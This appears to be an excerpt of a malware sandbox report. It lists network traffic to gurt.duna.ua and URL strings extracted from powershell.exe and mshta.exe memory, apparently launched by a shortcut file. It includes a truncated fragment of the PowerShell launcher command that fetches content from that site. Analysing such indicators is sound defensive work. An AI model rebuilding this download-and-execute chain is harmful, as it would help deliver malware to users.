Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/husky.js?ver=1.3.4.2 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.3.8 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tracker.js?ver=1.13.1 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7 HTTP/1.1Accept: /Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: gurt.duna.ua

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 27 Oct 2024 06:35:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closelink: <https://gurt.duna.ua/wp-json/>; rel="https://api.w.org/"x-turbo-charged-by: LiteSpeedx-ray: wnp447:0.300/wn447:0.260/wo447X-Page-Speed: onCache-Control: max-age=0, no-cache

Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, select_radio_check[1].css.3.dr	String found in binary or memory: http://codepen.io/elmahdim/pen/hlmri
Source: svchost.exe, 00000005.00000002.2953737003.000001FF7500F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000005.00000003.1899762996.000001FF74E98000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000005.00000003.1899762996.000001FF74E98000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000005.00000003.1899762996.000001FF74E98000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000005.00000003.1899762996.000001FF74ECD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.5.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: chosen.min[1].css.3.dr	String found in binary or memory: http://getharvest.com
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gmpg.org/xfn/11
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gmpg.org/xfn/11I
Source: powershell.exe, 00000002.00000002.1731496106.00000226019EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1744803090.0000022610080000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1744803090.00000226101B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1731496106.0000022601991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1731496106.0000022601863000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1731496106.0000022600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1731496106.0000022601863000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000002.00000002.1731496106.0000022601991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1731496106.0000022601863000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1731496106.0000022600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.w.org/
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.jsdelivr.net/npm/intersection-observer-polyfill
Source: powershell.exe, 00000002.00000002.1744803090.00000226101B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1744803090.00000226101B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1744803090.00000226101B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000005.00000003.1899762996.000001FF74F42000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000005.00000003.1899762996.000001FF74F42000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000002.00000002.1731496106.0000022601991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1731496106.0000022601863000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: mshta.exe, 00000003.00000003.1823734718.00000184077F0000.00000004.00000020.00020000.00000000.sdmp, chosen.min[1].css.3.dr	String found in binary or memory: https://github.com/harvesthq/chosen
Source: mshta.exe, 00000003.00000003.1823734718.00000184077F0000.00000004.00000020.00020000.00000000.sdmp, chosen.min[1].css.3.dr	String found in binary or memory: https://github.com/harvesthq/chosen/blob/master/LICENSE.md
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/#website
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/?s=
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/cart/
Source: mshta.exe, 00000003.00000002.2954352575.00000184079F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/comments/feed/
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/dohovir-oferty/
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/feed/
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/feed/5
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/help/
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/my-account/
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/my-account/edit-account/
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/my-account/lost-password/
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/my-account/orders/
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/my-discounts/
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/order-table/
Source: powershell.exe, 00000002.00000002.1731496106.0000022601701000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEA
Source: mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933398840.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2-6
Source: mshta.exe, 00000003.00000002.2953230766.0000018407788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2...
Source: mshta.exe, 00000003.00000002.2953230766.0000018407710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2...L
Source: mshta.exe, 00000003.00000002.2953230766.0000018407710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2...x
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage20
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage205
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933398840.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage22
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933398840.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage22&5
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933398840.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2246
Source: powershell.exe, 00000002.00000002.1747753246.000002266AE40000.00000004.00000020.00020000.00000000.sdmp, T15hf0Y3mp.lnk	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg
Source: powershell.exe, 00000002.00000002.1749215327.000002266B080000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1750564132.000002266C910000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1747999307.000002266AECC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1747753246.000002266AE47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg=Get-Location;$eCRg=Join-Path
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2?
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2?6
Source: mshta.exe, 00000003.00000003.1933398840.00000184077A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Ar
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2C:
Source: mshta.exe, 00000003.00000002.2951847916.0000017C054D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2H
Source: mshta.exe, 00000003.00000003.1823944466.000001840776D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2L
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2N
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2N6
Source: mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2P
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Q6
Source: mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2a
Source: mshta.exe, 00000003.00000003.1933398840.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2b6o
Source: mshta.exe, 00000003.00000002.2953889531.0000018407925000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2https://gurt.duna.ua/programy-naucz
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2i
Source: mshta.exe, 00000003.00000003.1823944466.000001840776D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2j1x
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2q5r
Source: mshta.exe, 00000003.00000002.2952176599.0000017C057E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2s
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2smp
Source: mshta.exe, 00000003.00000002.2953230766.0000018407788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2vrz
Source: mshta.exe, 00000003.00000003.1823768527.00000184077B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2w
Source: mshta.exe, 00000003.00000003.1823768527.00000184077B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2~.
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/ru/optovaia-prodazha-duna/
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/shop/
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-admi
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-admin/admin-ajax.php
Source: mshta.exe, 00000003.00000002.2953889531.000001840792D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-admin/admin-ajax.phpuX
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-admin/js/password-strength-meter.min.js?ver=6.1.3
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-c?
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFU0UzdYPFkaVNA6w.woff)
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFUkUzdYPFkaVNA6w.woff)
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFV0UzdYPFkaVN.woff)
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFVUUzdYPFkaVNA6w.woff)
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFWUUzdYPFkaVNA6w.woff)
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFWkUzdYPFkaVNA6w.woff)
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7
